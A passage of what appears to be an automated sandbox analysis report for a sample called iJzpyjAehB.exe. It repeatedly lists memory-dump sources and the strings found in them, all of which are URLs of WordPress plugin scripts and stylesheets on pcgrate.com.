                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/css/email-subscribers-public
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/js/email-subscribers-public.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/css/fm-public.css?ver=1.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/icons/line-awesome/css/l
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/js/fm-public.js?ver=1.0.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/css/frontend.min.css?ver=3.3.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/preloaded-elements-handlers.min.js?
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/webpack-pro.runtime.min.js?ver=3.3.
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 